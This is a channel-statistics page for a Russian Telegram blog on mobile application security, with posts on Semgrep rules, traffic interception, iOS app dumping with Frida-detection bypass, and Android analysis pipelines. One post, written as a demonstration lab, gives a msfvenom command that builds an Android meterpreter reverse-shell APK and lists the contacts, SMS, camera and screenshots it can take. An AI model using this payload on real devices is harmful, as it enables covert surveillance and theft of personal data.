ar
Feedback
Дневник Комбеза

Дневник Комбеза

الذهاب إلى القناة على Telegram

История одного Кибер Безопасника из маленького города в Сибири

إظهار المزيد
لم يتم تحديد البلدالفئة غير محددة
688
المشتركون
لا توجد بيانات24 ساعات
+107 أيام
+6430 أيام

جاري تحميل البيانات...

القنوات المماثلة
لا توجد بيانات
هل تواجه مشاكل؟ يرجى تحديث الصفحة أو الاتصال بمدير الدعم الخاص بنا.
الإشارات الواردة والصادرة
---
---
---
---
---
---
جذب المشتركين
يوليو '26
يوليو '26
+76
في 2 قنوات
يونيو '26
+48
في 1 قنوات
Get PRO
مايو '26
+21
في 0 قنوات
Get PRO
أبريل '26
+66
في 0 قنوات
Get PRO
مارس '26
+69
في 0 قنوات
Get PRO
فبراير '26
+28
في 1 قنوات
Get PRO
يناير '26
+15
في 0 قنوات
Get PRO
ديسمبر '25
+12
في 0 قنوات
Get PRO
نوفمبر '25
+24
في 0 قنوات
Get PRO
أكتوبر '25
+19
في 2 قنوات
Get PRO
سبتمبر '25
+194
في 2 قنوات
Get PRO
أغسطس '250
في 0 قنوات
Get PRO
يوليو '25
+46
في 0 قنوات
Get PRO
يونيو '250
في 1 قنوات
Get PRO
مايو '25
+148
في 1 قنوات
التاريخ
نمو المشتركين
الإشارات
القنوات
29 يوليو+5
28 يوليو0
27 يوليو+1
26 يوليو+1
25 يوليو+3
24 يوليو0
23 يوليو+4
22 يوليو+4
21 يوليو+4
20 يوليو+7
19 يوليو+5
18 يوليو+21
17 يوليو+3
16 يوليو+6
15 يوليو0
14 يوليو+4
13 يوليو+1
12 يوليو+2
11 يوليو+1
10 يوليو0
09 يوليو0
08 يوليو+1
07 يوليو+1
06 يوليو0
05 يوليو0
04 يوليو0
03 يوليو+1
02 يوليو+1
01 يوليو0
منشورات القناة
Semgrep Rules Последнее время мы с командой всё чаще задумывались о том, что mobsfscan в части своего Semgrep-компонента, мягко говоря, местами глючный и довольно ограниченый. А если попробовать найти достаточно полный набор Semgrep-правил для мобильных приложений, быстро выясняется, что хорошие правила разбросаны по всему необъятному интернету🔞 Поэтому мы решили собрать всё это в одном месте и создали репозиторий: https://github.com/Sib-Coder/semgrep-mobile-rules В нём постарались собрать максимально полный набор проверок для мобильных приложений и при этом избавиться от дубликатов. Будем очень рады вашей поддержке, новым правилам и идеям для развития репозитория. Давайте делать мобилки безопаснее вместе 😎

2
لا يوجد نص...
0
3
Пост для тех кто не боится Очень часто слышу: «Да что с помощью ваших этих мобилок можно сделать?» Сегодня практическая работ+2
Пост для тех кто не боится Очень часто слышу: «Да что с помощью ваших этих мобилок можно сделать?» Сегодня практическая работа именно для таких людей. Вам понадобится: - телефон; - Metasploit; - сеть с нормальной маршрутизацией; - навыки реверса APK — уровня детского сада достаточно. Первое, что вам нужно, — сделать APK со зловредным функционалом. Берём Metasploit и вперёд: bash msfvenom -p android/meterpreter/reverse_tcp lhost=<сюда пишете IP своего ноута> lport=8888 > $PWD/Downloads/msf.apk Дальше берёте APK, который у вас получился, и делаете так, чтобы команда adb install сработала: в паре мест патчите полученный APK и подписываете его. Не привожу полный гайд, чтобы кто попало не начал устраивать слежку за своими одноклассницами. Они и без моей помощи найдут способы для буллинга. Дальше — msfconsole, запускаем приложение на телефоне. В результате мы можем наблюдать, что даже при условии, что приложение собрано не под самую новую ОС Android, нам есть что взять с телефона: - список контактов; - SMS — даже отправить можно: я так кинул денег другу за шаурму; - скриншоты; - доступ к камере; - ... Как итог: на мой взгляд, получилась весьма показательная лаба для тех, кто говорит, что из МП ничего сделать нельзя. Советую повторить данное упражнение со своими коллегами. Ну или хотя бы покажите им этот пост :)
761
4
Традиционное ежегодное мероприятие по получению джеилбрейков объявляется открытым😂+1
Традиционное ежегодное мероприятие по получению джеилбрейков объявляется открытым😂
548
5
Нигде не безопасно. Из всех "чайников" мы уже знаем, что существует OWASP top 10 для веб-приложений, но многие ли из вас задумывались, есть ли пересечения с мобилками? А задуматься стоит, ведь мобильное приложение - это по сути тот же веб. Собственно, статья про корреляцию уязвимостей на вебе и мобилках и уникальные проблемы, а так же разбор этих уязвимостей в коде и на схемах. Кто дочитает до конца: 1 - преисполнится 2 - найдёт практический чек-лист 3 - список дополнительной литературы для погружения #AppSec #Pentest 🧠 Кибер ПТУ | 👨‍🏫 Менторство ИБ 📂 Другие каналы
556
6
+1
Прочитал книгу «Проект “Феникс”. Роман о том, как DevOps меняет бизнес к лучшему» Это очень понятная история о том, зачем вообще нужны процессы и почему без них любая команда рано или поздно начинает тонуть в хаосе. Главная мысль, которую я вынес: процессы — это не бюрократия ради бюрократии. Нормально построенный процесс помогает команде быстрее двигаться, меньше тушить пожары и лучше понимать, какую ценность она реально приносит бизнесу. Книга хорошо показывает, что IT существует не само по себе. Любая задача, релиз, багфикс или изменение в инфраструктуре должны быть связаны с бизнес-целями: деньгами, скоростью, надежностью, пользовательским опытом, снижением рисков. И отдельно мне понравилось, как через сюжет становится понятно, зачем бизнесу нужна команда безопасности. Безопасность — это не команда, которая приходит в конце и говорит: «Нет, так нельзя». В идеальном мире безопасность помогает строить процессы так, чтобы продукт развивался быстро, но при этом не создавал критичные риски для компании, клиентов и данных. Очень советую к прочтению всем кому интересно понять: как моя работа влияет на бизнес...
885
7
Android SELinux Internals Part II: домены, отказы, обходы Ребята из 8ksec наконец-то выпустили вторую часть серии про SELinux на Android! Первая часть была про основы: контексты, чтение политик, sepolicy-inject. Вторая уже про то, как это всё работает в реальности. Разбирается вся цепочка от сертификата подписи APK до SELinux-домена, роль Zygote, как работает installd. Добавили практики: chcon, runcon, как работает magiskpolicy под капотом, чем принципиально отличаются подходы Magisk, KernelSU и APatch. Очень сочная и большая статья для любителей мякотки и чтоб погрузиться поглубже в то, как и что устроено внутри. Ну и анонсированная третья часть обещает быть ещё интереснее: kernel-level техники отключения SELinux и разбор реальных CVE. Что сказать, ждем :) #Android #SELinux #Pentest #Research #Kernel #Tools
462
8
Сраный Burp… Самое неприятное в пентесте мобилок — когда приложение не работает из твоей страны, но посмотреть, куда оно ходи
Сраный Burp… Самое неприятное в пентесте мобилок — когда приложение не работает из твоей страны, но посмотреть, куда оно ходит и какие API дёргает, всё равно надо. Мы с коллегой пентестили Flutter-приложение, и мне досталась iOS-часть. А это значит: pinning, сертификаты, прокси, VPN и немного боли. Сначала собрали схему через Burp: iPhone → OpenVPN → iptables DNAT → Burp → интернет Трафик заворачивался, tcpdump показывал, что пакеты доходят, сертификаты подменялись, curl проходил. Но трафик не отображался... После часа дебага стало понятно: проблема не в OpenVPN, не в iptables и не в маршрутах. Просто Burp опять решил пожить своей жизнью и периодически не прогонял через себя весь трафик. В итоге переехали на более простую схему: iPhone → OpenVPN → iptables REDIRECT → mitmproxy → WireGuard → интернет Поднял mitmweb прямо на OpenVPN-сервере, завернул 80/443 с iPhone локально на 8080, а сам сервер выпустили наружу через wg0. Понятно что после этого надо было бы похукать пару функций через frida, но в этот раз повезло и разрабы не заморачивались. Схему, как собрать такое окружение, приложу ниже. Кстати этот метод работает на многих приложениях так как мало кто научился от него нормально защищаться.
514
9
iDump: замена frida-ios-dump без Python (но с блекджеком и обходами) Если кому-то нужно было когда-нибудь сдампить приложение с iOS трубки, то первое, что приходит на ум - классический frida-ios-dump. Но с Frida 17+ он сломался и, судя по всему, уже не починится. И вот появился iDump - переосмысление того же подхода, но без всей той боли с pip, зависимостями, правильное версией Python и тд Автор этого шикарного тула - широко известный в узких кругах @OxFi5t, спасибо ему за это! Написан на Go с использованием frida-go, и главная идея это автономность. Один самодостаточный бинарь, который уже содержит в себе Frida-агент. Скопировал в PATH и работает. Техника та же, что у оригинала: инжектим агент, патчим cryptid, вытаскиваем расшифрованные сегменты Mach-O, собираем валидный IPA. Только без лишних телодвижений 🤓 Из приятного: - поддержка батч-дампинга (можно сразу несколько приложений или вообще `--dump-all`) - фильтрация по bundle ID - пропуск системных приложений Apple Передача файлов идёт через Frida messages напрямую — SSH не нужен (хотя SSH/SFTP режим тоже есть, если USB-трансфер медленный). Отдельно порадовал флаг --dodge - встроенный bypass для приложений, которые детектят Frida и падают до того, как агент успевает что-то сделать. Есть базовый вариант (хукает libc-символы: ptrace, sysctl и тд) и --dodge=advanced для особо упоротых приложений, которые делают raw syscalls и сканируют память на Frida-сигнатуры. Ну и возможность передать свой bypass-скрипт через --early, если встроенные не справляются. Так что тут можно еще и идеи по обходу джейлбрейка/фриды подсмотреть 😉 Очень рекомендую попробовать. Как по мне, давно нужна была нормальная замена 🔥 #iOS #Frida #ReverseEngineering #Tools #iDump
446
10
Я окончательно перестал играть в CTF. Причин, наверное, несколько. Последние полгода я постепенно отключался от этого процесса и переключался на вещи, которые сейчас кажутся мне более интересными и полезными. Для меня CTF всё ещё остаётся офигенным форматом практики. Особенно в обучении: когда мы разрабатываем курсы, тренинги или внутренние соревнования, CTF-задачи отлично помогают закреплять навыки руками. Но вот участвовать в CTF как игрок на постоянной основе мне больше не хочется. Проблема не в том, что формат плохой. Проблема в том, что многие соревнования, на мой взгляд, потеряли прежний шарм. Всё чаще игра превращается не в «думай, ломай, проверяй гипотезы», а в распинывание агента. Да, можно играть без Codex, Claude и всего остального зоопарка AI-инструментов. Можно. Но зачем? Если таски пишутся с помощью ИИ, решаются с помощью ИИ, а эксплойты подбираются за секунды, то игра без ИИ превращается просто в добровольную потерю 80% силы. А ведь раньше весь кайф CTF был как раз в другом. Ты сидишь, тупишь, скрипишь мозгами, пробуешь странные идеи, проваливаешься, снова пробуешь — и в какой-то момент сам приходишь к решению. Вот это чувство и было главным. А сейчас всё чаще выглядит так: «Codex, тут сайт, походу SSTI вот в этом месте» Через несколько секунд: готовый эксплойт. В 2021 году я кайфовал от каждого решённого таска. От каждого маленького продвижения. От момента, когда после нескольких часов тупняка что-то наконец сходилось, и ты такой: «А, вот оно». Сейчас этого ощущения стало сильно меньше. Наверное, просто стало неинтересно играть в игру, где всё чаще соревнуются не люди, а их агенты.
539
11
Мой пайплайн по анализу андроид приложений: Stage 0 — APK Metadata (apk-info): Мгновенный парсинг (~2мс) манифеста без декомпиляции: пакет, SDK-версии, все permissions, exported-компоненты, подписи (v1/v2/v3), security profile. Уже на этом этапе детектит: debuggable-флаг, v1-only подпись (уязвимость Janus, CVE-2017-13156), привилегированные системные permissions, exported ContentProvider'ы без защиты. Stage 1 — Декомпиляция + сканирование APK (параллельно): Всё запускается одновременно: • JADX — декомпиляция DEX → Java (8 потоков, 60-180с) • apktool — распаковка ресурсов, AndroidManifest.xml, нативных .so библиотек (5-15с) • dexfinder — поиск использования скрытых Android API + трассировка цепочек вызовов • Mariana Trench — taint-анализ потоков данных от Meta (source→sink) • Trueseeing — Dalvik bytecode scanner • Автодетект Flutter → Blutter (реверс Dart-кода), React Native → декомпиляция Hermes Stage 2 — Статический анализ (параллельно): • 184 regex-правила — быстрый pattern matching по декомпилированным исходникам • 331 semgrep-правило — AST-анализ (taint tracking, data flow) • Анализ Blutter pp.txt (Dart-символы для Flutter-приложений) • dexfinder call chain tracing — трассировка цепочек вызовов от exported-компонентов к уязвимым методам Stage 3 — Merge + фильтрация + обогащение: • Дедупликация по (rule_id, file, line) • SDK-фильтр (732 паттерна) — убирает 98% шума от Google, Firebase, OkHttp, Retrofit и ещё 150+ SDK • Классификация severity через RoBERTa модель • Аннотация exported-статуса: кросс-проверка finding → AndroidManifest → dexfinder reachability • RAG-обогащение каждого finding контекстом из базы знаний Stage 4 — LLM-анализ (6 агентов параллельно): Каждый агент — специалист в своей области, получает только релевантные findings + RAG-контекст: • Agent 1: Manifest + Attack Surface • Agent 2: Network + TLS • Agent 3: Auth + Cryptography • Agent 4: WebView + JS Bridge • Agent 5: Business Logic • Agent 6: Native Libraries • Agent 7 (Judge): валидирует CRITICAL/HIGH от всех агентов, отсекает false positives RAG Knowledge Base: • 9675 chunks в ChromaDB (гибридный поиск: BM25 + vector + RRF) • 1547+ отчётов из 18 источников: — OWASP MASTG: 120 (тестовые процедуры с примерами кода) — HackerOne: 170 (реальные bug bounty отчёты с PoC) — MITRE ATT&CK Mobile: 124 (техники атак, детекция, митигации) — Security blogs: 207 (Google, Zimperium, Lookout, Check Point) — Samsung Bulletins: 111 (Samsung-specific CVE) — NVD: 250 (CVE с CVSS) — Exploit-DB: 50 — Android Bulletins: 34 — CISA KEV: 23 — Собственные аудиты: 144 — Прочие: arXiv, VulCorpus (94 OWASP Top-10 сэмплов) • Граф знаний: 5597 узлов, 9213 связей (CVE↔️CWE↔️MITRE↔️MASTG) • 970+ code snippets в отдельном индексе
505